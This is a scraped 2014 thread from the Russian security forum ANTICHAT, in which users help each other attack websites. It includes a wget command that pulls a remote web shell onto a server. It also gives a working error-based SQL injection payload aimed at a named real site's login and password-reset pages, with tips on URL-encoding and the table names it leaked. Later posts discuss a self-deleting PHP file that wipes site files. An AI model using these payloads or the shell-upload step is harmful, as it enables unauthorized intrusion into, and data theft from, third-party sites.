ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.08.2014, 17:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 2413
Репутация:
0
|
|
Сообщение от madhatter
madhatter said:
Вы таки не поверите, но wget -O s.php http://site/shell.ext. Или curl. Или что угодно подобное.
Таки может и поверил бы, если бы знал что да как)За совет спасибо, помогло!
|
|
|
|

25.08.2014, 10:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от vikler
vikler said:
Вопрос. Сайт с post-инъекцией
Код:
Code:
http:// www.umg- aec.com/verifpwd.asp?User name=hjjjjjjjjjj&Password=gggggggggggg%27
Вроде как стандартная error based. Но при попытке получения любой информации поучаю редирект на сообщения о неверности un/pw:
Код:
Code:
http:// www.umg- aec.com/verifpwd.asp?User name=hjjjjjjjjjj'&Password=gggggggggggg+OR+1=@@version--
Как обойти/раскрутить?
Смотрите в эту cторону:
Сообщение от None
POST /forgotpasswordsubmit.asp
username
=
'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('Pages','Ima gePresets','Project','ImageUploadServers', 'NetherlandPubPhotos','dtproperties','Images'))--
|
|
|
|

25.08.2014, 16:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 36068
Репутация:
0
|
|
Сообщение от YaBtr
YaBtr said:
Смотрите в эту cторону:
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Incorrect syntax near the keyword 'or'.
|
|
|
|

25.08.2014, 17:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от vikler
vikler said:
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Incorrect syntax near the keyword 'or'.
Все прекрасно выводит:
Сообщение от None
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Conversion failed when converting the nvarchar value '
ImagesBackUp
' to data type
upd
Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.
|
|
|
|

25.08.2014, 17:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 36068
Репутация:
0
|
|
Сообщение от YaBtr
YaBtr said:
Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.
спасибо. Действительно, я и не подумала. Теперь всё отлично
|
|
|
|

26.08.2014, 22:48
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
ребят , на сайте пентестер нашел один файл *.php
содержимое такое:
Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))
насколько это верно? движок сайта - WP.
|
|
|

26.08.2014, 22:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 4766
Репутация:
0
|
|
Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.
|
|
|
|

26.08.2014, 22:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 15642
Репутация:
6
|
|
Сообщение от bumer
bumer said:
Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.
Раздел "Статьи" и пошел штудировать
|
|
|
|

26.08.2014, 23:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 15642
Репутация:
6
|
|
Сообщение от B1t.exe
B1t.exe said:
ребят , на сайте пентестер нашел один файл *.php
содержимое такое:

Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))
насколько это верно? движок сайта - WP.
Все верно, все файлы *.php в текущем каталоге будут удалены.
Причем этот файл сам себя удалит, тем самым типа "заметет следы"
|
|
|
|

26.08.2014, 23:22
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
Сообщение от UXOR
UXOR said:
Все верно, все файлы *.php в текущем каталоге будут удалены.
Причем этот файл сам себя удалит, тем самым типа "заметет следы"
Спасибо.
а это что за прикол? самописный (от разработчика сайта) или сайт взломали и ставили?
просто смысл удаления всех файлов.. хочу понять мотив.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|